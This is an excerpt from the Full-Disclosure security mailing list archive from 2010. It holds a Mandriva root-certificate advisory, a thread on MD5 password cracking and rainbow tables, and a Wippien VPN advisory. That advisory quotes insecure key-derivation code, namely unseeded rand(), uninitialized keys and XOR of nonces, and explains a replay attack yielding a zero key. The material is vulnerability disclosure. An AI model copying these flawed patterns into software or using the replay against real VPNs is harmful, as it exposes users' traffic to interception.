http://translate.googleusercontent.com/translate_c?hl=zh-CN&sl=zh-CN&tl=en&u=http://hi.baidu.com/yuange1975/blog/item/022dec59443c4d212834f041.html&rurl=translate.google.cn&usg=ALkJrhg-C-arlz2AxJEkRSQznuAAoSqdNg#comment
________________________________
????????????????????MSN?????? ??????????
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/8354f98f/attachment.html 

From henri at nerv.fi  Thu Feb  4 15:39:52 2010
From: henri at nerv.fi (Henri Salo)
Date: Thu, 4 Feb 2010 17:39:52 +0200
Subject: [Full-disclosure] Fingerprinting web applications (Joomla,
 Mediawiki and Wordpress)
In-Reply-To: 
References: 
Message-ID: <20100204173952.76c8bfe5@foo.fgeek.fi>

On Fri, 29 Jan 2010 18:30:07 -0400
dd at sucuri.net wrote:

> Hi List,
> 
> I just posted a document on fingerprinting web applications where I
> show some ideas to remotely detect the version of Joomla, Mediawiki
> and Wordpress (easily extended to other apps).
> 
> http://sucuri.net/?page=docs&title=fingerprinting-web-apps
> 
> There is also a live tool for you to test with any site:
> http://sucuri.net/?page=docs&title=fingerprinting-web-apps#v6
> 
> 
> Thanks,
> 
> --dd

Check .

---
Henri Salo


From security at mandriva.com  Thu Feb  4 16:01:00 2010
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 04 Feb 2010 17:01:00 +0100
Subject: [Full-disclosure] [ MDVSA-2010:032 ] rootcerts
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:032
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : rootcerts
 Date    : February 4, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 It was brought to our attention by Ludwig Nussel at SUSE the md5
 collision certificate should not be included. This update removes
 the offending certificate.
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 
 The mozilla nss library has consequently been rebuilt to pickup these
 changes and are also being provided.
 _______________________________________________________________________

 References:

 http://www.phreedom.org/research/rogue-ca/
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 c0be9cd2cbe32ecf0cbe9efcc6b48bcf  2008.0/i586/libnss3-3.12.3.1-0.3mdv2008.0.i586.rpm
 4c85c05a4963b29efbe93324a73c0119  2008.0/i586/libnss-devel-3.12.3.1-0.3mdv2008.0.i586.rpm
 78ea532897f095f3f0d022fb5196b310  2008.0/i586/libnss-static-devel-3.12.3.1-0.3mdv2008.0.i586.rpm
 faa1a9f6d4ea0779c50d89b0995eb878  2008.0/i586/nss-3.12.3.1-0.3mdv2008.0.i586.rpm
 b97cacbe47f6f4621bdf001c1a52279f  2008.0/i586/rootcerts-20091203.04-1mdv2008.0.i586.rpm 
 b77f8a14ff4d042fb56df39fcdc8c6b4  2008.0/SRPMS/nss-3.12.3.1-0.3mdv2008.0.src.rpm
 fc9bc5da8d92ed59ca9e1116fc1e1066  2008.0/SRPMS/rootcerts-20091203.04-1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 ac8d7f4bcc518b7b114708e04ef2a81c  2008.0/x86_64/lib64nss3-3.12.3.1-0.3mdv2008.0.x86_64.rpm
 7fd80d8e75bc863e8cc156f8eda34c99  2008.0/x86_64/lib64nss-devel-3.12.3.1-0.3mdv2008.0.x86_64.rpm
 7e257ca13d9b4e5671e12014f8454fcd  2008.0/x86_64/lib64nss-static-devel-3.12.3.1-0.3mdv2008.0.x86_64.rpm
 2890ad45cde084278e6c1aa41518616f  2008.0/x86_64/nss-3.12.3.1-0.3mdv2008.0.x86_64.rpm
 1f4c8926245d72f28ee8f558367cb310  2008.0/x86_64/rootcerts-20091203.04-1mdv2008.0.x86_64.rpm 
 b77f8a14ff4d042fb56df39fcdc8c6b4  2008.0/SRPMS/nss-3.12.3.1-0.3mdv2008.0.src.rpm
 fc9bc5da8d92ed59ca9e1116fc1e1066  2008.0/SRPMS/rootcerts-20091203.04-1mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 1e7275412d2d4b737a3aa661bb5b0c50  2009.0/i586/libnss3-3.12.3.1-0.3mdv2009.0.i586.rpm
 2f253257d1140719dbccf85637373c2b  2009.0/i586/libnss-devel-3.12.3.1-0.3mdv2009.0.i586.rpm
 65eca7cfcce65b60e69e95e8ba751621  2009.0/i586/libnss-static-devel-3.12.3.1-0.3mdv2009.0.i586.rpm
 fa8c65e3c9907d1a7724b749acd2b665  2009.0/i586/nss-3.12.3.1-0.3mdv2009.0.i586.rpm
 67dc4b43b2c5b258673fcd164a9b9c4d  2009.0/i586/rootcerts-20091203.04-1mdv2009.0.i586.rpm
 4186a8c454fae03ce21ef73a73e27a4d  2009.0/i586/rootcerts-java-20091203.04-1mdv2009.0.i586.rpm 
 5b7822e13fb0b95668be13e39158e069  2009.0/SRPMS/nss-3.12.3.1-0.3mdv2009.0.src.rpm
 8ba6271c1c615620593cd84e1d173d00  2009.0/SRPMS/rootcerts-20091203.04-1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 20c00afa062067ab98741c44f319afb1  2009.0/x86_64/lib64nss3-3.12.3.1-0.3mdv2009.0.x86_64.rpm
 a4251bc21bf5af1c08509d2bd9c76212  2009.0/x86_64/lib64nss-devel-3.12.3.1-0.3mdv2009.0.x86_64.rpm
 81a3bbe448dc979799f6062b3fe0c2c6  2009.0/x86_64/lib64nss-static-devel-3.12.3.1-0.3mdv2009.0.x86_64.rpm
 913011d490c5147d3b1ee34ba8be1ab2  2009.0/x86_64/nss-3.12.3.1-0.3mdv2009.0.x86_64.rpm
 10e756644972160ea696dddf9c96803f  2009.0/x86_64/rootcerts-20091203.04-1mdv2009.0.x86_64.rpm
 d67b2fdc4ed9bfbe87dcd57df0187038  2009.0/x86_64/rootcerts-java-20091203.04-1mdv2009.0.x86_64.rpm 
 5b7822e13fb0b95668be13e39158e069  2009.0/SRPMS/nss-3.12.3.1-0.3mdv2009.0.src.rpm
 8ba6271c1c615620593cd84e1d173d00  2009.0/SRPMS/rootcerts-20091203.04-1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 df7500efc910c929ff5ba7746c6dabeb  2009.1/i586/libnss3-3.12.3.1-0.3mdv2009.1.i586.rpm
 d3b0b27b327cb504cd4b05777ed55fa8  2009.1/i586/libnss-devel-3.12.3.1-0.3mdv2009.1.i586.rpm
 4323ce43b907753870dc288d7f2e640e  2009.1/i586/libnss-static-devel-3.12.3.1-0.3mdv2009.1.i586.rpm
 cd365d77dd94c02912d469ce5215beb5  2009.1/i586/nss-3.12.3.1-0.3mdv2009.1.i586.rpm
 0570308849f28b09a876d72fc47836e6  2009.1/i586/rootcerts-20091203.04-1mdv2009.1.i586.rpm
 2dedbde7d658cf77b302ad9f7b051357  2009.1/i586/rootcerts-java-20091203.04-1mdv2009.1.i586.rpm 
 1f4f9447cce88026fc67d3dbd2413de3  2009.1/SRPMS/nss-3.12.3.1-0.3mdv2009.1.src.rpm
 e6acad2a8a3e795c19a885c9a8e77e30  2009.1/SRPMS/rootcerts-20091203.04-1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 38948df2bcdfc9b34cadc1b16a0f67a9  2009.1/x86_64/lib64nss3-3.12.3.1-0.3mdv2009.1.x86_64.rpm
 e2f6989e17ab71c6d24b29cc543ea7af  2009.1/x86_64/lib64nss-devel-3.12.3.1-0.3mdv2009.1.x86_64.rpm
 c7b8d609c5fc1f11bfc5ee743906e288  2009.1/x86_64/lib64nss-static-devel-3.12.3.1-0.3mdv2009.1.x86_64.rpm
 c221f46ba77caacd158708e3a913d211  2009.1/x86_64/nss-3.12.3.1-0.3mdv2009.1.x86_64.rpm
 29a5204bfa28b1cccbf1c071047d2073  2009.1/x86_64/rootcerts-20091203.04-1mdv2009.1.x86_64.rpm
 dc7d3c85103609c70b755d9a21938563  2009.1/x86_64/rootcerts-java-20091203.04-1mdv2009.1.x86_64.rpm 
 1f4f9447cce88026fc67d3dbd2413de3  2009.1/SRPMS/nss-3.12.3.1-0.3mdv2009.1.src.rpm
 e6acad2a8a3e795c19a885c9a8e77e30  2009.1/SRPMS/rootcerts-20091203.04-1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 2be08ef724b95d7a6e704321e07fa10e  2010.0/i586/libnss3-3.12.4-2.2mdv2010.0.i586.rpm
 ed12884eced5f6cd0c508c7f99a1da21  2010.0/i586/libnss-devel-3.12.4-2.2mdv2010.0.i586.rpm
 632d90069e3f168a56d1154c9614d907  2010.0/i586/libnss-static-devel-3.12.4-2.2mdv2010.0.i586.rpm
 a086ad0e94373ba3c41d14e30adbe9d0  2010.0/i586/nss-3.12.4-2.2mdv2010.0.i586.rpm
 e984c6277a2652bce16c386291ca9f14  2010.0/i586/rootcerts-20091203.04-1mdv2010.0.i586.rpm
 de701ae417835f8d258ba4920af03ce2  2010.0/i586/rootcerts-java-20091203.04-1mdv2010.0.i586.rpm 
 c90c11d64a63966caff483436d1369a2  2010.0/SRPMS/nss-3.12.4-2.2mdv2010.0.src.rpm
 0366a795cffe41abf644a4d251fd5cd1  2010.0/SRPMS/rootcerts-20091203.04-1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 0f7bad4f8db6fbc5b46345b616569f82  2010.0/x86_64/lib64nss3-3.12.4-2.2mdv2010.0.x86_64.rpm
 a3780118c20d0968b697768078a91140  2010.0/x86_64/lib64nss-devel-3.12.4-2.2mdv2010.0.x86_64.rpm
 bd97fde246cfaa89521d1fe519ac504f  2010.0/x86_64/lib64nss-static-devel-3.12.4-2.2mdv2010.0.x86_64.rpm
 555dfd2280715adf5ecf878392f412f7  2010.0/x86_64/nss-3.12.4-2.2mdv2010.0.x86_64.rpm
 a85ef46a3f7390e525499da8cb517b28  2010.0/x86_64/rootcerts-20091203.04-1mdv2010.0.x86_64.rpm
 f10c590d898002ef12a7836a6c946810  2010.0/x86_64/rootcerts-java-20091203.04-1mdv2010.0.x86_64.rpm 
 c90c11d64a63966caff483436d1369a2  2010.0/SRPMS/nss-3.12.4-2.2mdv2010.0.src.rpm
 0366a795cffe41abf644a4d251fd5cd1  2010.0/SRPMS/rootcerts-20091203.04-1mdv2010.0.src.rpm

 Mandriva Enterprise Server 5:
 9fa3e7b43ab7dd6b71e93f7d7a530d9b  mes5/i586/libnss3-3.12.3.1-0.3mdvmes5.i586.rpm
 17c13b7371d4461e4590f3296b164d01  mes5/i586/libnss-devel-3.12.3.1-0.3mdvmes5.i586.rpm
 fa7e5b35446a4b15fee350e4eb6469de  mes5/i586/libnss-static-devel-3.12.3.1-0.3mdvmes5.i586.rpm
 5d47263f3e2fe1d6eca529fbc41e1a45  mes5/i586/nss-3.12.3.1-0.3mdvmes5.i586.rpm
 be3d17c8e3b70b2eea882d145a15ad3c  mes5/i586/rootcerts-20091203.04-1mdvmes5.i586.rpm
 afb96495ab464ee24a66857b3a81d56b  mes5/i586/rootcerts-java-20091203.04-1mdvmes5.i586.rpm 
 f62814393267a1208020f4d0033dd525  mes5/SRPMS/nss-3.12.3.1-0.3mdvmes5.src.rpm
 73ce2343464a93c3bc85b07a8781fd2e  mes5/SRPMS/rootcerts-20091203.04-1mdv2010.1.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 9d251b020faa05a233856ccae1ca5e4e  mes5/x86_64/lib64nss3-3.12.3.1-0.3mdvmes5.x86_64.rpm
 78e80398614e4f7968c9617a3020829a  mes5/x86_64/lib64nss-devel-3.12.3.1-0.3mdvmes5.x86_64.rpm
 566d190a3eb0a7aa9465ef58eb228b18  mes5/x86_64/lib64nss-static-devel-3.12.3.1-0.3mdvmes5.x86_64.rpm
 9ceff03efa5892bfef7032a2261ee136  mes5/x86_64/nss-3.12.3.1-0.3mdvmes5.x86_64.rpm
 5d5e4319fdc03572a356934a61879e86  mes5/x86_64/rootcerts-20091203.04-1mdvmes5.x86_64.rpm
 84cd50aafe7321078026fb9a82ee2c33  mes5/x86_64/rootcerts-java-20091203.04-1mdvmes5.x86_64.rpm 
 f62814393267a1208020f4d0033dd525  mes5/SRPMS/nss-3.12.3.1-0.3mdvmes5.src.rpm
 73ce2343464a93c3bc85b07a8781fd2e  mes5/SRPMS/rootcerts-20091203.04-1mdv2010.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLasA8mqjQ0CJFipgRAvWTAJ9q+4DLAscYRneWfm/GEfwYzIWJngCglu3b
6Ze+ZosQNiAPdmdu0mRM2Pk=
=xf3+
-----END PGP SIGNATURE-----


From Thor at hammerofgod.com  Thu Feb  4 15:51:45 2010
From: Thor at hammerofgod.com (Thor (Hammer of God))
Date: Thu, 4 Feb 2010 15:51:45 +0000
Subject: [Full-disclosure] anybody know good service for
	cracking	md5?	6A9-4CD
In-Reply-To: 
References: 
	
	
Message-ID: 

It's actually "you're," but I never bothered correcting him, even though having it in his signature was kind of bad.

t

> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-
> disclosure-bounces at lists.grok.org.uk] On Behalf Of McGhee, Eddie
> Sent: Thursday, February 04, 2010 6:03 AM
> To: Gregor Schneider; netinfinity
> Cc: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] anybody know good service for cracking
> md5? 6A9-4CD
> 
> "because your paranoid,"
> 
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-
> disclosure-bounces at lists.grok.org.uk] On Behalf Of Gregor Schneider
> Sent: 04 February 2010 13:57
> To: netinfinity
> Cc: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] anybody know good service for cracking
> md5? 6A9-4CD
> 
> 2010/2/4 netinfinity :
> > And why are my reply's spam???
> 
> - beacuse of your fullquotes
> 
> - because you're hijacking a thread
> --
> just because your paranoid, doesn't mean they're not after you...
> gpgp-fp: 79A84FA526807026795E4209D3B3FE028B3170B2
> gpgp-key available
> @ http://pgpkeys.pca.dfn.de:11371
> @ http://pgp.mit.edu:11371/
> skype:rc46fi
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


From tbiehn at gmail.com  Thu Feb  4 16:10:43 2010
From: tbiehn at gmail.com (T Biehn)
Date: Thu, 4 Feb 2010 11:10:43 -0500
Subject: [Full-disclosure] anybody know good service for cracking md5?
In-Reply-To: 
References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com>
	<504.1265232402@localhost>
	<3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk>
	<3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8A0380E817@PRO-EXCHANGESRV.experian.dk>
	<3af3d47c1002040405n32a1ef39g3c704e6a439d99c@mail.gmail.com>
	
Message-ID: <2d6724811002040810g544119b5t5e3df587e6bc9f83@mail.gmail.com>

Rainbowcrack-Online was doing precomp dictionary attacks in conjunct
with rainbowtables in 2k5.
The hype spike for RC tables was back in 2k4.

You're off by 5 years Christian.

-Travis

On Thu, Feb 4, 2010 at 7:21 AM, McGhee, Eddie  wrote:
> Are you serious? People have been using rainbow tables for years mate.. and
> they are rather widely used.. no need to replace useful with anything, the
> statement was plain wrong..
> ________________________________
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Christian
> Sciberras
> Sent: 04 February 2010 12:06
> To: Anders Klixbull
> Cc: full-disclosure at lists.grok.org.uk; Valdis.Kletnieks at vt.edu
> Subject: Re: [Full-disclosure] anybody know good service for cracking md5?
>
> FINE. Replace "useful" with "widely popular".
>
>
>
>
> On Thu, Feb 4, 2010 at 1:04 PM, Anders Klixbull  wrote:
>>
>> lol they have been useful for years son
>> just because YOU never found a use for them doesn't mean noone else has :)
>>
>>
>> ________________________________
>> From: Christian Sciberras [mailto:uuf6429 at gmail.com]
>> Sent: 4. februar 2010 13:00
>> To: Anders Klixbull
>> Cc: Valdis.Kletnieks at vt.edu; full-disclosure at lists.grok.org.uk
>> Subject: Re: [Full-disclosure] anybody know good service for cracking md5?
>>
>> Uh, in the sense that they are finally becoming actually useful...
>>
>>
>>
>>
>>
>> On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull  wrote:
>>>
>>> seems to be cropping in?
>>> as far as know rainbow tables has been around for years...
>>>
>>>
>>> ________________________________
>>> From: full-disclosure-bounces at lists.grok.org.uk
>>> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Christian
>>> Sciberras
>>> Sent: 3. februar 2010 23:02
>>> To: Valdis.Kletnieks at vt.edu
>>> Cc: full-disclosure at lists.grok.org.uk
>>> Subject: Re: [Full-disclosure] anybody know good service for cracking
>>> md5?
>>>
>>> Actually dictionary attacks seem to work quite well, especially for
>>> common users which typically use dictionary and/or well known passwords
>>> (such as the infamous "password").
>>> Another idea which seems to be cropping in, is the use of hash tables
>>> with a list of known passwords rather then dictionary approach.
>>> Personally, the hash table one is quite successful, consider that it
>>> targets password groups rather than a load of wild guesses.
>>>
>>> Cheers.
>>>
>>>
>>>
>>>
>>> On Wed, Feb 3, 2010 at 10:26 PM,  wrote:
>>>>
>>>> On Wed, 03 Feb 2010 23:42:07 +0300, Alex said:
>>>>
>>>> > i find some sites which says that they can brute md5 hashes and WPA
>>>> > dumps
>>>> > for 1 or 2 days.
>>>>
>>>> Given enough hardware and a specified md5 hash, one could at least
>>>> hypothetically find an input text that generated that hash. ?However,
>>>> that
>>>> may or may not be as useful as one thinks, as you wouldn't have control
>>>> over
>>>> what the text actually *was*. ?It would suck if you were trying to crack
>>>> a password, and got the one that was only 14 binary bytes long rather
>>>> than
>>>> the one that was 45 printable characters long. ;)
>>>>
>>>> Having said that, it would take one heck of a botnet to brute-force an
>>>> MD5 has
>>>> in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5
>>>> would
>>>> take on the order of 10**22 years. ?If all 140 million zombied computers
>>>> on the
>>>> internet were trying 1 billion keys per second, that drops it down to
>>>> 10**16
>>>> years or so - or about 10,000 times the universe has been around
>>>> already.
>>>>
>>>> I suspect they're actually doing a dictionary attack, which has a good
>>>> chance
>>>> of succeeding in a day or two.
>>>>
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da


From uuf6429 at gmail.com  Thu Feb  4 16:12:26 2010
From: uuf6429 at gmail.com (Christian Sciberras)
Date: Thu, 4 Feb 2010 17:12:26 +0100
Subject: [Full-disclosure] anybody know good service for cracking md5?
In-Reply-To: <2d6724811002040810g544119b5t5e3df587e6bc9f83@mail.gmail.com>
References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com>
	<504.1265232402@localhost>
	<3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk>
	<3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8A0380E817@PRO-EXCHANGESRV.experian.dk>
	<3af3d47c1002040405n32a1ef39g3c704e6a439d99c@mail.gmail.com>
	
	<2d6724811002040810g544119b5t5e3df587e6bc9f83@mail.gmail.com>
Message-ID: <3af3d47c1002040812u47fbb41akd69c71d919bc12db@mail.gmail.com>

Or just immature on these issues...






On Thu, Feb 4, 2010 at 5:10 PM, T Biehn  wrote:
> Rainbowcrack-Online was doing precomp dictionary attacks in conjunct
> with rainbowtables in 2k5.
> The hype spike for RC tables was back in 2k4.
>
> You're off by 5 years Christian.
>
> -Travis
>
> On Thu, Feb 4, 2010 at 7:21 AM, McGhee, Eddie  wrote:
>> Are you serious? People have been using rainbow tables for years mate.. and
>> they are rather widely used.. no need to replace useful with anything, the
>> statement was plain wrong..
>> ________________________________
>> From: full-disclosure-bounces at lists.grok.org.uk
>> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Christian
>> Sciberras
>> Sent: 04 February 2010 12:06
>> To: Anders Klixbull
>> Cc: full-disclosure at lists.grok.org.uk; Valdis.Kletnieks at vt.edu
>> Subject: Re: [Full-disclosure] anybody know good service for cracking md5?
>>
>> FINE. Replace "useful" with "widely popular".
>>
>>
>>
>>
>> On Thu, Feb 4, 2010 at 1:04 PM, Anders Klixbull  wrote:
>>>
>>> lol they have been useful for years son
>>> just because YOU never found a use for them doesn't mean noone else has :)
>>>
>>>
>>> ________________________________
>>> From: Christian Sciberras [mailto:uuf6429 at gmail.com]
>>> Sent: 4. februar 2010 13:00
>>> To: Anders Klixbull
>>> Cc: Valdis.Kletnieks at vt.edu; full-disclosure at lists.grok.org.uk
>>> Subject: Re: [Full-disclosure] anybody know good service for cracking md5?
>>>
>>> Uh, in the sense that they are finally becoming actually useful...
>>>
>>>
>>>
>>>
>>>
>>> On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull  wrote:
>>>>
>>>> seems to be cropping in?
>>>> as far as know rainbow tables has been around for years...
>>>>
>>>>
>>>> ________________________________
>>>> From: full-disclosure-bounces at lists.grok.org.uk
>>>> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Christian
>>>> Sciberras
>>>> Sent: 3. februar 2010 23:02
>>>> To: Valdis.Kletnieks at vt.edu
>>>> Cc: full-disclosure at lists.grok.org.uk
>>>> Subject: Re: [Full-disclosure] anybody know good service for cracking
>>>> md5?
>>>>
>>>> Actually dictionary attacks seem to work quite well, especially for
>>>> common users which typically use dictionary and/or well known passwords
>>>> (such as the infamous "password").
>>>> Another idea which seems to be cropping in, is the use of hash tables
>>>> with a list of known passwords rather then dictionary approach.
>>>> Personally, the hash table one is quite successful, consider that it
>>>> targets password groups rather than a load of wild guesses.
>>>>
>>>> Cheers.
>>>>
>>>>
>>>>
>>>>
>>>> On Wed, Feb 3, 2010 at 10:26 PM,  wrote:
>>>>>
>>>>> On Wed, 03 Feb 2010 23:42:07 +0300, Alex said:
>>>>>
>>>>> > i find some sites which says that they can brute md5 hashes and WPA
>>>>> > dumps
>>>>> > for 1 or 2 days.
>>>>>
>>>>> Given enough hardware and a specified md5 hash, one could at least
>>>>> hypothetically find an input text that generated that hash. ?However,
>>>>> that
>>>>> may or may not be as useful as one thinks, as you wouldn't have control
>>>>> over
>>>>> what the text actually *was*. ?It would suck if you were trying to crack
>>>>> a password, and got the one that was only 14 binary bytes long rather
>>>>> than
>>>>> the one that was 45 printable characters long. ;)
>>>>>
>>>>> Having said that, it would take one heck of a botnet to brute-force an
>>>>> MD5 has
>>>>> in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5
>>>>> would
>>>>> take on the order of 10**22 years. ?If all 140 million zombied computers
>>>>> on the
>>>>> internet were trying 1 billion keys per second, that drops it down to
>>>>> 10**16
>>>>> years or so - or about 10,000 times the universe has been around
>>>>> already.
>>>>>
>>>>> I suspect they're actually doing a dictionary attack, which has a good
>>>>> chance
>>>>> of succeeding in a day or two.
>>>>>
>>>>>
>>>>> _______________________________________________
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> FD1D E574 6CAB 2FAF 2921 ?F22E B8B7 9D0D 99FF A73C
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> http://pastebin.com/f6fd606da
>


From michael.rossberg at tu-ilmenau.de  Thu Feb  4 15:58:17 2010
From: michael.rossberg at tu-ilmenau.de (Michael Rossberg)
Date: Thu, 4 Feb 2010 16:58:17 +0100
Subject: [Full-disclosure] Multiple Security Issues in Wippien
Message-ID: <55897556-1E7F-4D5C-ADB0-465E879AAB31@tu-ilmenau.de>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                               Security Advisory

      Advisory: Multiple Security Issues in Wippien
  Release Date: February 4th, 2010
  Last Updated: February 4th, 2010
        Author: Michael Rossberg [michael dot rossberg at tu-ilmenau  
dot de]
   Application: Wippien (for Windows and Linux)
                MiniVPN
      Severity: Flawed key negotiation protocol allows for easy man-in- 
the-middle
                attacks
                Predictable key materials
          Risk: Critical
Vendor Status: Contacted
    References: http://wcms1.rz.tu-ilmenau.de/fakia/fileadmin/template/startIA/telematik/Mitarbeiter/rossberg/wippien-advisory.txt


SUMMARY

Wippien is a software that can automatically establish a VPN between  
jabber
contacts. In order to derive a session key for the encryption routines  
Wippien
uses a cryptographic key exchange, which is in the open source part of  
the
software. As we analyzed some of its components, it emerged that the RSA
fingerprints are not validated and the freshness of the exchange is  
not assured.
Each of both issues allows simple man-in-the-middle attacks.

The Windows version of Wippien and MiniVPN use an insecure random number
generator to derive key material.

The Linux version of Wippien does not initialize keying material. This  
results
in uninitialized memory being used to derive the symmetric encryption  
key.

AFFECTED SOFTWARE VERSIONS

All recent versions of Wippen for Windows and Linux, including 2.3.2,  
are
affected.

SEVERITY RATING

Being a VPN component, confidentiality is the essential property to be  
assured
and given the simplicity of potential attacks, the potential risk is  
high.

DETAILS

1.) Wippien creates a new private/public key pair with every startup.  
This and
     the fact that the fingerprint of the peers public key is not  
shown to the
     user, makes it impossible for users to even become aware of man- 
in-the-
     middle attacks.
2.) During the key exchange, Wippien peers exchange nonces that are  
protected
     by RSA PKCS#1. These nonces are later on used to derive a session  
key by an
     XOR operation:

         // and XOR with ours
         for (int i = 0; i < 16; i++)
			user->m_SharedKey[i] = user->m_MyKey[i] ^ dst[i + 24];

     Thus, if the key exchange is simply replayed to the connecting  
victim, it
     will simply XOR its own key part with itself, resulting in a zero  
key and an
     attacker without valid key is able to obtain a correct key.
3.) The Windows version of Wippien and MiniVPN will initialize the key  
by using
     rand():
         for (int i = 0; i < 16; i++) m_MyKey[i] = rand();
     This is neither a secure source for keying material, nor is  
srand() called
     to supply a seed. This makes key generation highly predictable.
4.) The Linux version works similar:
         for (i=0;i<16;i++)
	       u->SharedKey[i] = u->MyKey[i] ^ dst[i+24];
     Only that MyKey is never initialized, and thus random value will  
be used and
     the derived key is highly insecure.

DISCLOSURE TIMELINE

28th January, 2010 - Contact with Wippien developer by email

RECOMMENDATION

We recommend to migrate from Wippien or use an additional form of  
cryptographic
protection, e.g., SSH and SSL, immediately.

GPG KEY

pub   4096R/B105F0C3 Michael Rossberg
Key fingerprint = 8448 88F0 C803 14FD 01AF A819 D2BF 817D B105 F0C3

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (Darwin)

iQIVAwUBS2q6vNK/gX2xBfDDAQLSZBAAnnQWBct0Liyp9QoOmAvpQrK8QiLhnlDT
GAepuXzBxPON1lh2og4ZObRG19Hy95TkKbt+JEPe0ZQkKvLLyjVcTcNfzaTlQOdD
SGyedlj1+Y5EH5CH08Zno+EGPBITQgIq+phSeuBijXL+q1rfISchjWGq/xrAHtvE
K3laKbhNogh0jib83F1xOrlPUlqR5OsejdqF/+uiDuwseRhWpy0HEF++ysXvLAgp
QfYrGqBn0FrQgOfLgHuysSDvqJFXzmDaS9T/HtxCmrT1OnbeD9tv0hihCk9RnKux
OrLvAZ57YP6u8IDRyGxG3CAG54A+GPN8OBC4t/ShujOd9isqGajp/PthE7l1pl+p
L1PaYxDJ/esDmM+AepMN7/XjKqh6ol3DLnIBMX76DBod/aynlln7bAuWHhQ80gyQ
zU+pgKg1N0V5uw8qhzeoEWKdXjUQY4QQovOrnQ4rqMO0Hhp4Kt4faMD1YVSLeOGJ
MXDAJCZBu4PngZeUggE8tYrLFX+ulOcyUG44juRZ+chJc7FfQwKbD73u02NLWK4H
Gw/aWcJvG9fhsZ/nSdIY+Qu5DInw0E0gECpBJPCQVI59xd1uMh79Vs25zPNfe7PI
QKWfM/iuCrL2tAXKc+1Xnh4hZoXN7k+qUvYFfAHZXTZsZJst4x0SjOthiGRu4oRV
7dUOELYP+Vo=
=meNb
-----END PGP SIGNATURE-----

-----------------------

 From the Wippien forum (http://www.wippien.com/forum.php?action=view&topic=1191281119 
):
